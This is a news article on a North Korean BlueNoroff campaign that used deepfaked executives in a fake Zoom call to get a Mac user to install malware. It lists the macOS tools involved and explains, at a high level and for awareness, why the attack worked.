North Korean hackers use deepfakes in Zoom calls to target Mac users

A North Korean hacking group used AI-generated video impersonations in a Zoom meeting to trick an employee into installing macOS malware.

What happened

On June 11, 2025, cybersecurity researchers at Huntress uncovered a new attack from the North Korean-linked group BlueNoroff, known for cryptocurrency-related cybercrime. In the incident, a tech firm employee was lured into a Zoom call where deepfake videos of company executives were used to build trust. During the meeting, the victim was persuaded to install what was claimed to be a Zoom microphone extension but was actually a malicious AppleScript file that triggered a multi-stage malware infection on their macOS device.

Going deeper

The attack began with Telegram messages posing as external professionals. The attackers shared a Calendly link that led to a fake Zoom meeting domain. In the call, deepfaked executives instructed the employee to install a file named zoom_sdk_support.scpt, allegedly to resolve microphone issues. The script launched a real Zoom SDK page to appear legitimate, but embedded a command to download a second-stage payload from a spoofed domain.

The malware campaign included several custom-built tools tailored for macOS.

• Telegram 2: A Nim-based implant masked as a Telegram updater, scheduled to maintain persistence.
• Root Troy V4: A Go-based backdoor with remote code execution and download capabilities.
• InjectWithDyld: A loader for encrypted implants, designed to operate stealthily and erase its tracks.
• XScreen (keyboardd): A surveillance tool that logs keystrokes, screen activity, and clipboard content.
• CryptoBot (airmond): A cryptocurrency-focused infostealer targeting over 20 wallet platforms.

BlueNoroff’s malware chain also included measures to bypass detection, such as valid developer signatures and the silent installation of macOS Rosetta to support x86 payloads on Apple Silicon devices.

What was said

Huntress researchers warned that Mac users are increasingly being targeted, especially as macOS becomes more common in enterprise settings. The use of deepfakes adds a new level of sophistication to social engineering tactics, blending credible visuals with trusted meeting platforms to deliver malicious code.

FAQs

What is BlueNoroff, and how is it linked to North Korea?

BlueNoroff is an advanced persistent threat (APT) group believed to operate under North Korea’s Reconnaissance General Bureau. It’s part of the larger Lazarus Group umbrella and is known for financial cybercrime, especially cryptocurrency theft.

How do deepfakes enhance the effectiveness of social engineering attacks?

Deepfakes can convincingly mimic trusted individuals like executives or partners in real-time video calls, making fraudulent requests or instructions seem legitimate and harder to question.

Why are AppleScript files effective for delivering Mac malware?

AppleScript allows automation on macOS and can execute system-level commands, making it a useful tool for attackers who want to disguise malware as legitimate functionality.

What makes this attack different from traditional phishing campaigns?

Unlike typical email phishing, this attack combined interactive video deepfakes, real-time deception, and advanced payload delivery tailored to the Mac environment, making it both targeted and technically layered.